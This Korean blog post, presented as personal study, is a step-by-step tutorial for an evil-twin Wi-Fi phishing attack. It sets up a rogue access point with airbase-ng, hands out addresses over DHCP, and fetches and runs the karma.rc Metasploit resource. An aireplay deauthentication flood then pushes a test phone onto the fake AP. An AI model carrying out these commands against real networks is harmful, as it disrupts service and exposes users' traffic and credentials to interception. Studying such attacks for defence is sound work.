[802.11] 무선네트워크-Phishing Attack

==============================================================================

::  WARNING  ::

이 포스트는 개인 공부를 위해 게시된 글입니다. 악의적으로 이용시 모든 책임은 당사자에게 있고 작성자는 관련없음을 알려드립니다.

==============================================================================

0x00. Phishing Attack

  말 그대로 낚시공격입니다.  해커가 구축한 가상 AP에 접속을 시켜 해커가 원하는 정보를 취득하는 공격법입니다.

  ※해커가 구축한 AP에 접속시키는 방법

   - 기존 접속된 AP에 DoS(서비스거부)공격을 가하여 접속을 끊게 한 후 해커의 AP에 재접속하는 경우

   - 해커의 AP신호세기가 기존 AP신호보다 강할 경우

   =>이 글에서는 위의 두가지 내용을 순서대로 수행했습니다.

0x01. Ready for phishing

    제 컴퓨터 기준으로 말씀드리겠습니다.

     - Back Track5 R3  (해킹 시스템) - AP로 작동중

     - Samsung Galaxy3 (피해 시스템)

     - 피해자로부터 응답 받을수 있는 DNS, HTTP서버(저는 karma.rc라는 툴을 이용하겠습니다.)

0X02. Start Attack

  #iwconfig

공격 전에 네트워크가 작동되고 있는지 확인을 하고 시작합시다^-^

#airmon-ng start [네트워크이름]   //wlan0를 모니터모드로 설정

#airbase-ng -c [채널] -e [가상 AP이름] -y -v [Interface]

  // 채널 11, "test"라는 이름으로 가상 AP생성 

  // airbase-ng를 실행하면 가상AP Interface인 at0가 생성됨

#ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

#route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

 // 접속된 Station에게 DHCP로 10.0.0.0의 영역대 IP를 부여

DHCP서버를 실행시키기 전 아래와 같이 설정

#dhcpd3 -cf [dhcpd.conf파일 위치] at0 // DHCP서버 시작

사용자로부터 응답을 받을수있는 DNS, HTTP서버가 필요합니다. 여기서 저는 karma.rc라는 툴을 이용하겠습니다.      [wget http://digitaloffense.net/tools/karma.rc]

#msfconsole -r [karma.rc파일위치]    //msfconsole로 karma.rc실행

#airodump-ng mon0

  ::근거리의 무선네트워크를 모니터할 수 있습니다. 위에서 airbase-ng로 test라는 AP가 생성되었으며 사용자(98:52:B1:60:0B:10)는 lstiptm이라는 공유기에 접속된 것을 확인할 수 있습니다.

동시에 결과를 확인하기위해 세장의 이미지를 붙였습니다.(차례 1번, 2번, 3번이라 칭함)

우선 2번이미지는 #aireplay -0 0 -a [AP MAC주소] mon0  라는 명령어를 실행시킨 결가입니다. 이 명령어를 실행시키면 해당 AP에 Dos공격이 실행되서 AP에 연결된 기기가 끊기게 됩니다.

1번 이미지는 #airmon-ng mon0 실행시킨 이미지인데, DoS를 실행시키자 사용자(98:52:B1:60:0B:10)가 test(00:22:FA:47:9F:34)에 접속한 것을 확인할수 있습니다.

드디어 사용자가 해커가 만든 가상 AP에 접속되었습니다!!